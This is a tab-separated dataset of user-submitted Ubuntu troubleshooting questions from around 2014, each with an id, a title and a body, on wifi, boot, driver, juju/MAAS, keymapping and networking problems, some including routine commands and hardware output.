471966	wifi continuously connects and disconnects from network	my ubuntu desktop 14.04 lts is connected through my home network ( where there are 2 pcs with windows 7 ) . my ubuntu pc is connected to network via netgear wifi usb adapter n150 wna1100 to a router netgear dgn1000 . the issue is that my computer continuously connects and disconnects from network and after my desktop crashed . what is the correct configuration and the problem ?
471969	ubuntu 12.04 boot problem ( headless )	so i set up an ubuntu box i have to run headless some time ago - using it as a media server for plex and other things . i 'm able to use x to remote desktop into the machine without a problem . however , i now have it hooked up to my tv and i ca n't figure out how to get a terminal/lightdm back locally . this is what i see after boot when the machine is running : i just want to know if anyone has an idea how to get lightdm to start again , or what i can do to access a command prompt .
471973	ubuntu 14.04 nautilus/nemo file manager hanging on every action	i can not use nautilus or nemo because of high loading time on each action , many times the applications simply hang and i 've busted my time on trying to fix it with no success whatsoever . here 's how i can describe it at this time : nautilus and nemo both hang after opening , after a few minutes it loads the home directory , but when changing the folder to other it hangs again for a few minutes . ( i 've tried all the combo 's possible , installed only nautilus , installed only nemo ... ) after failing with this i 've tried mc commander from the terminal that works smooth . my guess was that it was something wrong with x but i do n't really know how to get some details about the problem from the system as i have not found something that seemed usefull to me when executing gdb nautilus < proc_id > or reading dmesg . i would enjoy responding to your questions in order to solve this problem . i also got throught this problem : the problem can not be reported : you have some obsolete package versions installed . please upgrade the following packages and check if the problem still occurs : initramfs-tools , initramfs-tools-bin , libgudev-1.0-0
471975	is there any way , to make ubuntu resistant to corruption of data ?	i was using ubuntu 14.04 when due to power interruption , my computer was shut down . on reboot , it was corrupted and i lost all my data.i want to reinstall ubuntu again , is there any way , other than uninterrupted power supply , to make ubuntu resistant to corruption of data , so that such things do n't happen in future ?
471976	i 'd like to edit the window style for gvim is that possible ?	i 'd like to change the way gnome styles the window for gvim specifically ( maybe firefox in the future ) i want to remove the thin white/off white border , and possible recolor the title bar area to match my gvim background . any help would rock ! i 'm on gnome ubuntu ( just upgraded ubuntu to 14.04 ) with gnome 3.9.90 . i 'm using the default theme adwaita .
471977	i 've tried ubuntu 14 and 13 , on a dell 531s , only to make it to the login and no further !	is there something i 'm doing wrong ? i put an erased 250 gb hdd in the tower , and installed ( first tried 14 ) the os completely while connected to ethernet , tired with and without install updates for both 14 and then 13 thinking i had a compatibility issue ... and still stalls after the login screen ... please any help would be amazing , i am new to all this ... is it my graphics card ?
471982	in ubuntu 14.04 , grub is slowing down boot up of ubuntu . how to fix it ?	i use only ubuntu . when i first fresh installed ubuntu 14.04 , the purple frame hanged there for about 10 seconds . that was too slow for me , since i have i5 and ssd . before that , i had windows 7 , and it booted in seconds . i suspected the purple frame ( grub ) was slowing it down . so i searched a little bit on google and found this video and did what the guy showed . the purple frame was there for a less time , but it was still there . i changed the grub_timeout to 0 , so the purple frame should n't be there at all ( or am i wrong ? ) . i then changed grub_hidden_timeout_quiet to true , updated the grub , restarted the computer , and saw that , although grub timeout was set to 0 , it hanged there for about 3 secinds . how to remove it ? i do n't care about recovery options , i do n't need them , since my ubuntu is working great and i backup it regulary . i also tried one program for configuring grub , and it did n't work .
471986	problems with wireless since upgrade to 14.04	my laptop is a toshiba satellite l750 , which has a qualcomm atheros ar9285 wireless network adapter in it . when i was running 13.10 it all worked perfectly fine , but ever since i upgraded to 14.04 - literally , ever since the reboot after installing it - it has been problematic . the curious thing is though , it is only problematic connecting to the home wi-fi and not to other wi-fi services . specifically , i am now connected to my android phone acting as a wi-fi hotspot so that i can post this question , and it works perfectly . this laptop is the only device in the house that has trouble connecting to this wi-fi router as well - our tablets and phones all connect perfectly well , as does my partners windows laptop . also , the connection to the home wi-fi will sometimes work perfectly well and other times just not work at all , and the only thing i 've been able to find that will make any difference at all is to just wait and try again later . if it does n't work now - which it does n't - then in an hours time it might work perfectly well as if nothing was wrong , but if i then shut the lid and come back it will stop working again ... information : $ lspci | grep -ei wireless 02:00.0 network controller : qualcomm atheros ar9285 wireless network adapter ( pci-express ) ( rev 01 ) $ lshw ... .. *-network description : wireless interface product : ar9285 wireless network adapter ( pci-express ) vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 01 serial : e0 : ca:94:98 : ec:00 width : 64 bits clock : 33mhz capabilities : bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=ath9k driverversion=3.13.0-24-generic firmware=n/a ip=192.168.43.212 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:17 memory : c0500000-c050ffff ... .. $ uname -a linux daedalus 3.13.0-24-generic # 47-ubuntu smp fri may 2 23:30:00 utc 2014 x86_64 x86_64 x86_64 gnu/linux a section of /var/log/syslog from when it tries to connect to the home wi-fi is pasted at http : //pastebin.com/dphea7p8 too - as it was rather too long to stick in here ...
471989	changing icon font size/colour in 14.04	how can i change the desktop icon font size/colour to something more readable ? at the moment , icon text looks like this : unity-tweak-tool ( as mentioned in how do i change fonts and adjust their size ? ) has no way of changing these settings . any of the questions from older ubuntu distros are not relevant under 14.04 . update : from change default system font using terminal only in 14.04 , i can change the font/size with something like : gsettings set org.gnome.nautilus.desktop font 'ubuntu bold 12' i 'm still at a loss how to change the colour of the text , though .
471990	juju spends bootstrap-timeout with a final message it can not find /var/lib/juju/nonce.txt	i build two vmware 's machines . first one with maas , second one with a fresh installation from maas . region controller was installed with ubuntu 12.04 distribution , and upgraded ( . node computing was installed from maas with quantal 12.10 . juju was installed and upgraded to 1.18 ( from ppa : juju/stable repository ) . maas was upgraded from cloud-archive : tools repository . in debug mode , i got how juju connects to node . then i run the same instruction : ssh -o `` stricthostkeychecking no '' -o `` passwordauthentication no '' -i /home/lliurex/.juju/ssh/juju_id_rsa -i /home/lliurex/.ssh/id_rsa ubuntu @ ucc-nodo1.master /bin/bash it worked ( with and without /bin/bash ) . when juju spends all bootstrap-timeout tells it has not found /var/lib/juju/nonce.txt file . it 's true , it does n't exist . it does n't mind if you put a timeout of 1800 , 3600 or 72000 , it always finishes the same .
471995	ubuntu 14.04 offset mouse clicking in browsers	i 'm having this problem with chrome and firefox , and only when clicking the minimize button and then bringing the window back by clicking on the respective launcher icon . once maximized , the mouse pointer clicks slightly offset and only window resizing fixes this behaviour . edit : ok this is worse than i thought , it happens with all applications : libreoffice , terminal , nautilus ... edit 2 : it 's fixed , i did the steps described on this post : http : //ubuntuforums.org/showthread.php ? t=2219222 compizconfig option ubuntu unity plugin > switcher > show live previews of windows in the switcher . when the option is checked the mouse mismatch does n't occur
471997	send invites email to people in this file	for example we have a file and in this file we have email addresses to some people . is it possible to make script which will take this file and mail to all people in this file and with info about party ( time , what 's the should bring etc ? , place of meeting ) . at my lesson i have only been taught about sending simple email without this info in file etc . i would be grateful for any help . : )
471999	key mapping gone after restart	i 'm trying to remap my keyboard by using the following line : xmodmap -e `` keycode 94 = backslash '' it works but it will return back to default after restarts . how do i run this command every time i start up the computer ? i 'm a extreme beginner please give me a step-by-step guide . thank you !
472000	i have installed catalyst , but my gpu is not used ( hd 7970m )	i have installed amd catalyst , but when i am playing something , then it is not using my gpu ( in this case garry 's mod ) . my output of glxinfo | grep opengl is opengl vendor string : advanced micro devices , inc. opengl renderer string : amd radeon hd 7970m opengl core profile version string : 4.3.12798 core profile context 13.35.1005 opengl core profile shading language version string : 4.30 opengl core profile context flags : ( none ) opengl core profile profile mask : core profile opengl core profile extensions : opengl version string : 4.3.12798 compatibility profile context 13.35.1005 opengl shading language version string : 4.30 opengl context flags : ( none ) opengl profile mask : compatibility profile opengl extensions : i can tell its not using the gpu because my cpu is as hot as hell , but my gpu is completely cold . this is the information screen on my catalyst : http : //screencloud.net/v/ebxd
472003	xmodmap conflicting with xubuntu shortcuts	in xunbuntu 14.04 , xfwm is responsible for window management shortcuts like alt+f4 , alt+tab , etc . now , create a .xmodmapfile in your home folder , containing for example keycode 77 = nosymbol nosymbol nosymbol ( to deactivate numlock ) and launch xmodmap .xmodmap ( or logout and login ) . then , the numlock key is indeed deactivated , but the window management shortcuts do not work anymore ! is it a known bug ? does it happen to you as well ? is there a solution ?
472004	i ca n't download java or wine due to similiar error	i 've been trying to download java oracle 8 and wine and i keep getting the same problem . w : failed to fetch http : //dl.google.com/linux/chrome/deb/dists/stable/release unable to find expected entry 'main/source/sources ' in release file ( wrong sources.list entry or malformed file ) i get this when i try installing both and i 've been searching for a solution , but i ca n't find one . then there 's this problem : dpkg : error : failed to open package info file `/var/lib/dpkg/available ' for reading : no such file or directory what 's that mean and ho do i fix it ? ok , it does n't show that error anymore , thank you to all of you . i really appreciate the help . i have a next question though ... you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : liboxideqtcore0 : depends : oxideqt-codecs ( = 1.0.0~bzr501-0ubuntu2 ) but it is not going to be installed or oxideqt-codecs-extra ( = 1.0.0~bzr501-0ubuntu2 ) but it is not going to be installed wine1.7 : depends : wine1.7-amd64 ( = 1:1.7.19-0ubuntu2~trusty2 ) but it is not going to be installed depends : binfmt-support ( > = 1.1.2 ) but it is not going to be installed depends : wine1.7-i386 ( = 1:1.7.19-0ubuntu2~trusty2 ) but it is not installable recommends : gnome-exe-thumbnailer but it is not going to be installed or kde-runtime but it is not going to be installed recommends : ttf-mscorefonts-installer but it is not going to be installed recommends : fonts-horai-umefont but it is not going to be installed recommends : fonts-unfonts-core but it is not going to be installed recommends : ttf-wqy-microhei recommends : winetricks but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . i did the command and it said something about /var/lib/dpkg/lock , so i go there and ca n't open the file . i am trying to install wine 1.7 for ubuntu 14.04 64-bit .
472008	xerox driver - only color	at my university , we have xerox workcenter 7545 . so i downloaded this driver and installed the printer via `` provied a ppd file '' . then i configured everywhere monochrome printing . the problem is , that the printer-server still thinks i print in colormode , but the printing is in monochrome . since color-printing is very expensive at my university i , it would be nice to tell the server i really print monochrome . maybe you know some configuration files , where i can do some additional settings.. thank you
472013	how are we able to run eclipse.exe in ubuntu ?	i was following instructions to manually setup eclipse kepler in ubuntu 14.04 . next create an executable for eclipe at ~/bin/eclipse with your favorite text editor by typing vi ~/bin/eclipse or nano ~/bin/eclipse into the command line . add the following content : export mozilla_five_home= '' /usr/lib/mozilla/ '' export eclipse_home= '' $ home/opt/eclipse '' $ eclipse_home/eclipse $ * finally , allow the script to be executed : -- from eclipseide : preparing your system i am new to linux so i was just curious to know following things : why we are setting export mozilla_five_home= '' /usr/lib/mozilla/ '' for eclipse ? how this is related to eclipse ? what is $ * doing in $ eclipse_home/eclipse $ * ? how are we able to run eclipse.exe in ubuntu ? i think $ eclipse_home/eclipse is running eclipse.exe ? my questions could be very basic but i would appreciate any reference/answer . i have tried to search for answer but i am not able to find it .
472014	chrome and firefox not working/slow	chrome has stopped working and firefox is slow , sometimes so slow that it does not work at all . i have tried installing chromium , but the effects were the same . i uninstalled chrome and then updated ubuntu to 13.10 , but this had no effect either . the computer dual-boots with windows 7 , so i have tried chrome and firefox on windows and they work fine . my computer has 6gb of ram and high speed internet with a wired connection . thanks brian
472016	how to find programs that are appropriate to open a file ?	is there any command line command or any program which tells you or suggests you which programs you have installed on your system in order to run your passed file . for example when i write command file , which command is that command which you suggest to me and file is my file . for example my file is a music file and the result will suggest you have vlc to run your file . or imagine you type command hello.txt and the result are geany and vi .
472017	juju handshake node error..why ( juju.state open.g:93 tls handshake failed : x509 : certificate has expired or is not yet valid	there is an error on the node..reads 2014-05-25 14:00:00 error juju.state open.g:93 tls handshake failed : x509 : certificate has expired or is not yet valid 2014-05-25 14:00:01 error juju.state open.g:93 tls handshake failed : x509 : certificate has expired or is not yet valid ... 2014-05-25 14:00:02 error juju.state open.g:93 tls handshake failed : x509 : certificate has expired or is not yet valid ... this happends during bootstrap and , i believe this is why maas does not report to juju that the bootstrap node is ready ? this repeats it self every second until environments is destroy.. how do you correct this . let me add this is real metal not vm
472020	disable a device on boot	i am trying to disable a device at boot . i have put my commands in the /etc/rc.local file ( before the exit 0 ) but it does n't seem to work . here is how my file looks like : # ! /bin/sh -e # # rc.local # # this script is executed at the end of each multiuser runlevel . # make sure that the script will `` exit 0 '' on success or any other # value on error . # # in order to enable or disable this script just change the execution # bits . # # by default this script does nothing . echo `` ok 1 '' > > /tmp/rclocal_test xinput disable `` n-trig duosense '' xinput disable `` n-trig duosense pen '' echo `` ok 2 '' > > /tmp/rclocal_test exit 0 in my rclocal_test file , i only get ok 1 . when i execute rc.local from shell once the system is started , it works fine . i also tried to put the commands in the gnome-session-properties thing but nothing happens either . i am suspecting it is a problem of timing ( maybe i can not execute xinput disable at that time ? ) . do you have any idea ?
472022	uefi + ubuntu 14.04 on separate hdd	i have win8 installed on ssd1 and want to install ubuntu 14.04 lts on ssd2 i 've run default ubuntu installer using dvd . it finished w/o errors . i try to boot using `` boot menu '' choosing ssd2 to boot . no luck . computer asks me to insert boot media ... i 've tried to run boot_repair . here is a pastebin.http : //paste.ubuntu.com/7516572/ i see an error here : wrong grub version detected . please report this message to boot.repair @ gmail.com on line 9324 what do i do wrong ?
472026	alternative of multisim or pspice	i 'd used multisim and pspice in windows for circuit simulation . but both softwares are unavailable for ubuntu . is there any alternative ?
472027	will installing chrome on ubuntu do anything to chrome on windows ?	i have a dual boot computer ( ubuntu , windows 7 , both 64-bit ) . i installed chrome on ubuntu , and since that , my dad says chrome on windows is slower/internet does n't work/other stuff similar to them . i have an emachines e1331g . will installing programs on ubuntu do anything to programs on windows ?
472028	problem in executing a jar file in ubuntu 14.04lts	i have latest ubuntu 14.04 lts + java 1.7.0_55 + icedtea 2.4.7 installed however when i try to execute a jar file i get the notification : '' this application requires a newer version of the java runtime . please download and install the latest java runtime from java.com . then restart the application . '' what can be problem ? please help . thanks in advance and regards . sivaraman
472031	skype v4l2ucp webcam ubuntu 14.04lts 64 bit	how do i setup v4l2ucp to permanently fix the saturation for the webcam in skype 4.2 for my asus n73sv laptop running ubuntu 14.04lts 64bit fully updated . when i run v4l2ucp and reset saturation to 73 instead of default 63 the dark spots in my image are fixed . but every time that i log back into ubuntu or restart etc i have to reset the saturation again for the effects to be fixed in skype . please help .
472033	why is almost everything that i am typing underlined ?	i do n't know what happened , but until i post something virtually everything that i type is underlined and i do n't know why . this makes it difficult for me to see when there is a real error , does anyone know how to fix this ? this is a sample of what i am experiencing : thank you again for all of your help , i really appreciate it .
472034	common home partition , two systems , 32bit & 64bit	question : is it good for my home partition ? common for two systems : 12.04 - 32bit 14.04 - 64bit i 'm going to install this second system 14.04 - 64bit , is it possible to work well ?
472035	why does the `` host '' and `` nslokup '' command show the wrong ip ?	on my ubuntu 12.4 these work fine : $ hostname my-machine-xx ping `hostname` ping my-machine-xx ( 192.168.0.69 ) icmp_req=1 ttk=64 time=0.043 ms but host and nslookup return the wrong ip address : $ host my-machine-xx my-machine-xx has address 198.105.244.23 my-machine-xx has address 198.105.254.23 host my-machine-xx not found : 3 ( nxdomain ) $ nslookup my-machine-xx server : 127.0.0.1 address : 127.0.0.1 # 53 non-authoritative answer : name : my-machine-xx address : 198.105.244.23 name : my-machine-xx address : 198.105.254.23 i 'd appreciate help on how to fix it . thanks .
472038	how to route between two separate internal networks	i 've got two networks i 'm trying to connect , both on different subnets . eth0 - 10.0.0.0/24 eth1 - 192.168.0.0/24 i 've set up nat for both on ppp0 . lets say computer a ( 192.168.0.50 ) is trying to access services from computer b ( 10.0.0.60 ) , how would i set up routing to allow for that ? keeping in mind computer b may need to access computer a at some point as well . would this work ; up route add -net 192.168.0.0 netmask 255.255.255.0 gw 10.0.0.1 up route add -net 10.0.0.0 netmask 255.255.255.0 gw 192.168.0.1 or perhaps this ; sudo iptables -a forward -o eth0 -i eth1 -s 192.168.0.0/24 -m conntrack -- ctstate new -j accept sudo iptables -a forward -m conntrack -- ctstate established , related -j accept sudo iptables -t nat -f postrouting sudo iptables -t nat -a postrouting -o eth0 -j masquerade
472039	error on choosing location while freshly installing 14.04	i 'm trying to install 14.04 on my desktop and am running into this error after going through the partitioner . error screen : additional information : my system has da fake raid array ( raid 0 ) . but the partitioner seems to work just fine . i 've tried choosing different partition schemes and installation options but the error is constant .
472046	movie dvds spin and then get ejected	when i insert a movie dvd into my drive , it will spin up and down a couple times and then get ejected without any action or error message . data dvds are read fine . hardware : 2010 model imac output of lshw : cdrom description : dvd writer product : dvd rw ad-5680h vendor : optiarc physical id : 0.0.0 bus info : scsi @ 1:0.0.0 logical name : /dev/cdrom logical name : /dev/sr0 version : 3ahb capabilities : removable audio cd-r cd-rw dvd dvd-r configuration : ansiversion=5 status=open os : ubuntu 14.04 lts
472049	after 2nd update of ubuntu 12.04 lts no wlan0 again	i have a dell laptop with ubuntu 12.04 lts ( kernel 3.5.0-49-generic ) with qualcomm atheros qca9565 the first time , i did update and all the connections with the internet were lost . step by step , i restored the wired connection and then the wireless one . yesterday i got a message to update due to an error , so after the second update , i lost the wireless connection : there is no wlan0 anymore , only eth0 and lo . ii can see all the parts of atheros card but i ca n't get to install it . i downloaded drivers and i tried to install them but without success . i have read almost anything here and elsewhere about how to retrieve this and that but nothing worked . i am new to ubuntu . i need to restore my wireless connectivity . if possible , write me detailed instructions .
472051	change libreoffice impress screen background color	i would like to change the black background to white .
472054	accidently removed admin/sudo rights	i removed admin rights for the original admin account , in order to set up a new account with clear history . ( not 100 % that was needed , i am still getting to grips with linux / ubuntu 12.04 and i read somewhere that its not wise to use original account day to day , which i initially did . ) however , i did n't activate the password for the new account before applying changes . here 's what i did : set up new account ( no password ) added admin rights removed admin right from original no admin access it now seems as though i have no sudo /admin access . since i need the 'unset ' password of the inactive account , which is the only one with admin rights .
472056	create desktop apps using firefox possible ?	in chromium you can go to file > `` create application shortcuts '' ... this then allows you to add a `` webapp '' type shortcut to your launcher . is this possible through firefox with the same type of ease ? or what is the best/official way to do this in ubuntu 14.04 lts ?
472058	can not move a file using sudo mv	i want to move a downloaded folder ( called 'viva ' to the themes folder under /usr/share/themes/ . when i type : sudo mv /desktop/viva /usr/share/themes it tells me it ca n't find the /desktop/viva folder .
472061	what is the difference between an nvidia legacy binary proprietary driver and a binary only proprietary driver ?	what is the difference between an nvidia legacy binary proprietary driver and a binary only proprietary driver ?
472068	my localhost default page welcome me on nginx	hi all wrt my last post , again i am getting frustrated by nginx server , i am trying to install laravel in my /var/www/project folder but when i delete my default html dir from my /var/www/html it deviates me to nginx welcome page , neither my phpmyadmin working . how can i gain my apache back and also remove this nginx permanently .
472070	nvidia proprietary drivers - optimus technology	i read from here that ubuntu 14.04 has native optimus technology support.is this true or do i have to install the nvidia proprietary drivers ? if i have to install a proprietary driver which one is the correct for me ? as you can see from the screenshot i get four options for proprietary drivers :
472071	purple screen only on resume from hibernate	this might be a duplicate , apologies if it is ... i could n't find anything exactly identical . my system boots up just fine . but whenever it tries to resume from hibernation , i get to grub and then it hangs on a purple screen . ctrl+alt+f1 does n't do anything . this problem started in the last week after working perfectly for a year . in /var/log/pm-suspend.log the last entry is a bunch of successes for the sleep.d suspend_hybrid hooks . it seems like it successfully suspended . in /var/log/syslog , i see it tries to boot with : command line : boot_image=/boot/vmlinuz-3.11.0-20-generic root=uuid=4666fbf8-118b-4336-bc4b-54c0e7dfd118 ro nosplash nomodeset acpi_osi=linux acpi_backlight=vendor then there 's a ton of stuff in the syslog about networkmanager and a few other things but no real errors . any ideas on how to debug this ?
472073	google chrome 35 - protected flash content	since i upgraded to google chrome 35 it can no longer play protected flash content . according to omg ! ubuntu ! the support for npapi was dropped so that the adobe flash plugin ca n't be loaded anymore . is there any other way to play protected flash content besides using firefox rolling back google chrome to version 34 pray for an update from adobe ?
472074	errors with linux-image-3.8.0-36-generic and grub	os : ubuntu 12.04 lts problem 1 : when installing anything ( or updating ) it always ends with this error : errors were encountered while processing : linux-image-3.8.0-36-generic linux-image-3.8.0-38-generic linux-image-generic-lts-raring linux-generic-lts-raring problem 2 : when installing or updating stuff it opens some grub files and halts execution until i close these grub files . see screenshot below . grub files + terminal window ( screenshot ) pastebin with terminal output while trying to install something i should mention that i do n't known if these two errors are related , but it is a fact that every time i try to install something or run an update both of the above errors pop up . i could n't find anything of interest in the logs i looked at ( probably because i do n't know what/where to look ) , but tell me if you need me to upload something . edit 02 june . this is the output from lsb_release -a kasper @ ubunturw : ~ $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 12.04.4 lts release : 12.04 codename : precise
472075	how can i compare two directories recursively and check if one of the directories contains the other ?	i have two directories , they contain common files . i want to know if one directory contains the same file as the other . i found a script on the net but i want to need improve it to do recursively . # ! /bin/bash # cmp_dir - program to compare two directories # check for required arguments if [ $ # -ne 2 ] ; then echo `` usage : $ 0 directory_1 directory_2 '' 1 > & 2 exit 1 fi # make sure both arguments are directories if [ ! -d $ 1 ] ; then echo `` $ 1 is not a directory ! '' 1 > & 2 exit 1 fi if [ ! -d $ 2 ] ; then echo `` $ 2 is not a directory ! '' 1 > & 2 exit 1 fi # process each file in directory_1 , comparing it to directory_2 missing=0 for filename in $ 1/* ; do fn= $ ( basename `` $ filename '' ) if [ -f `` $ filename '' ] ; then if [ ! -f `` $ 2/ $ fn '' ] ; then echo `` $ fn is missing from $ 2 '' missing= $ ( ( missing + 1 ) ) fi fi done echo `` $ missing files missing '' would anybody suggest an algorithm for it ?
472076	update from ubuntu 13.10 to 14.04 changed fonts	i just upgraded my ubuntu 13.10 to 14.04 , but now all the fonts look different and i really would like to have the old fonts back . i tried to use other fonts but they also look rather bad . so how can i get the old fonts back ? to me it seems like the font definitions it self have changed ...
472078	remote install ubuntu server back to start ?	i got a ubuntu server where i have root access , i do not have access to it physically . there was a lot of random stuff on it when i got it . how can i install it back to clean , as it was in the start ? i was thinking that i needed to do something like this ? link i have removed anything from the /home folder , so i thought that might work , but iam not sure . would that work ? or would it be possible to upgrade it to a newer version and in the upgrade remove all the old files and make it to a clean install ?
472079	ubuntu on motorola droid 4	can anyone give me instruction on how to install ubuntu mobile o.s to a motorola droid 4 .
472080	ubuntu 14.04 ... .toshiba satellite wireles issues	i have a toshiba satellite c75-a laptop . with my integrated realtk network adapter my signal is very slow . however . with my netgear usb wireless adapter it runs at a normal speed . any advice will be appreciated .
472082	email client that saves attachments with message	does any know of an email client that saves attachments with messages , like outlook does ? i am currently using thunderbird and it saves as eml file without the attachment included , the attachment must be save separately . is there a way to include the attachment with the message when saving in one file and if not what mail client can ?
472085	nvidia borderless gaming in fullscreen	i 'm currently using the nvidia driver version 331.38 for my geforce g 103m in ubuntu . my screen resolution is 1600x900 . the game i 'm playing has a resolution with 800x600 . i can set it higher , but i dont want to . my problem is that i get a black border on the left and right when i play this game in fullscreen . i did n't face this problem when i used an older driver ( 295.40 ) . i want to play this game borderless , or that it scretches itself to fullscreen . i ca n't find any option for scretching the screen in nvidia-settings . i dont want to downgrade , i want to use the newest driver with the possibility to play games in any resolution borderless . thanks
472087	sensor identification	when i run sensors i get : acpitz-virtual-0 adapter : virtual device temp1 : +56.0°c ( crit = +102.0°c ) coretemp-isa-0000 adapter : isa adapter physical id 0 : +55.0°c ( high = +86.0°c , crit = +100.0°c ) core 0 : +50.0°c ( high = +86.0°c , crit = +100.0°c ) core 1 : +52.0°c ( high = +86.0°c , crit = +100.0°c ) i have a quad-core i5 processor . how do i identify what physical id 0 and temp1 stand for ?
472089	how can i configure my mouse pad features on 14.04 lts ?	i ca n't scroll up or down by my mouse pad . does it need a driver ? or something else ? any solution please ?
472091	install ubuntu without cd or usb	on my laptop i want to install ubuntu 14.04 but both my usb and cd drives are broken . i want to know how to install without needing the usb or cd . if you can help that is welcome .
472093	sd card is partially detected	i have asus u36jc and most of things is working at least good . but today i 've tried to use any sd card and it does n't work . after some work i 've achieved something : lsusb : bus 002 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 006 : id 08ff:1680 authentec , inc. aes1660 fingerprint sensor bus 001 device 005 : id 0b05:1788 asustek computer , inc . bus 001 device 011 : id 058f:6366 alcor micro corp. multi flash reader bus 001 device 003 : id 04f2 : b1b9 chicony electronics co. , ltd asus integrated webcam bus 001 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub lspci : 00:00.0 host bridge : intel corporation core processor dram controller ( rev 18 ) 00:01.0 pci bridge : intel corporation core processor pci express x16 root port ( rev 18 ) 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 18 ) 00:16.0 communication controller : intel corporation 5 series/3400 series chipset heci controller ( rev 06 ) 00:1a.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 06 ) 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 06 ) 00:1c.0 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 1 ( rev 06 ) 00:1c.1 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 2 ( rev 06 ) 00:1c.2 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 3 ( rev 06 ) 00:1c.3 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 4 ( rev 06 ) 00:1c.5 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 6 ( rev 06 ) 00:1d.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 06 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev a6 ) 00:1f.0 isa bridge : intel corporation mobile 5 series chipset lpc interface controller ( rev 06 ) 00:1f.2 sata controller : intel corporation 5 series/3400 series chipset 4 port sata ahci controller ( rev 06 ) 00:1f.6 signal processing controller : intel corporation 5 series/3400 series chipset thermal subsystem ( rev 06 ) 01:00.0 vga compatible controller : nvidia corporation gt218m [ geforce 310m ] ( rev ff ) 03:00.0 network controller : intel corporation centrino wireless-n 1000 [ condor peak ] 07:00.0 usb controller : fresco logic fl1000g usb 3.0 host controller ( rev 04 ) 08:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller ( rev 06 ) ff:00.0 host bridge : intel corporation core processor quickpath architecture generic non-core registers ( rev 05 ) ff:00.1 host bridge : intel corporation core processor quickpath architecture system address decoder ( rev 05 ) ff:02.0 host bridge : intel corporation core processor qpi link 0 ( rev 05 ) ff:02.1 host bridge : intel corporation core processor qpi physical 0 ( rev 05 ) ff:02.2 host bridge : intel corporation core processor reserved ( rev 05 ) ff:02.3 host bridge : intel corporation core processor reserved ( rev 05 ) sudo fdisk -l : disk /dev/sda : 120.0 gb , 120034123776 bytes 255 heads , 63 sectors/track , 14593 cylinders , total 234441648 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0006c0a9 device boot start end blocks id system /dev/sda1 * 2048 499711 248832 83 linux /dev/sda2 501758 234440703 116969473 5 extended /dev/sda5 501760 234440703 116969472 83 linux disk /dev/mapper/sda5_crypt : 119.8 gb , 119774642176 bytes 255 heads , 63 sectors/track , 14561 cylinders , total 233934848 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/ubuntu -- vg-root : 111.4 gb , 111404908544 bytes 255 heads , 63 sectors/track , 13544 cylinders , total 217587712 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/ubuntu -- vg-swap_1 : 8367 mb , 8367636480 bytes 255 heads , 63 sectors/track , 1017 cylinders , total 16343040 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 ls /dev/sd* : /dev/sda /dev/sda1 /dev/sda2 /dev/sda5 /dev/sdb drives : so drive is detected , but card is not . any idea how to fix it ?
472096	`` device herring not found on server '' when installing ubuntu touch	i am getting this message when trying to get my nexus s eat ubuntu : jason @ jason-asus : ~ $ sudo ubuntu-device-flash -- channel=devel -- bootstrap 2014/05/25 22:43:30 expecting the device to be in the bootloader ... waiting 2014/05/25 22:43:30 device is |herring| 2014/05/25 22:43:30 device herring not found on server https : //system-image.ubuntu.com channel devel anybody some idea ?
472097	kernel panic after installing a driver with ndiswrapper	so during my quest to get tl-wn821n , i got stopped by this problem.. i installed all the ndiswrapper programs with sudo apt-get install . they were , commons , utils-1.9 , source , gtk and something else i think . so i got it all installed , restarted and so far so good . now i installed my usb wifi card driver which was for xp 64bit . another restart and bam : so what is this and how can i recover from this ? booting ubuntu in recovery mode will produce the same error .
472098	remote desktop only works one way	i have two computers running ubuntu 14 . i can make a remote desktop connection from pc1 to pc2 , but not from pc2 to pc1 . one is sitting on wired and the other sitting on wireless on the same router . i installed xrdp server on both machines . the one i ca n't connect to is an old p4 installed from a minimal install iso . i use remmina with a vnc virtual connection in both cases , and i gave the same remote access settings . the pc i succeded connecting to does n't ask for anything , the other one is asking for a ssh-password . any help will be very much appriciated best regards kresten
472099	errors with vmware crashing with windows 7 as guest	every time i try to change the theme for my windows 7 guest machine , do anything that would change appearance , or anything involving aero at all , vmware gives me a dialog that says '' vmware player unrecoverable error : ( svga ) unexpected signal : 11 . a log file is available in [ path to vm folder ] /windows 7/vmware.log . you can request support . to collect data to submit ... '' etc etc i really want aero , and i really need windows 7 , i need a stable vm with some eye candy , and if aero is a no go then i 'd really ask for suggestions of another vm manager/player but if there is any way to do it under vmware that would be much preferred . please tell me how i can stop the errors and get aero working , that 's all i really need to know right now .
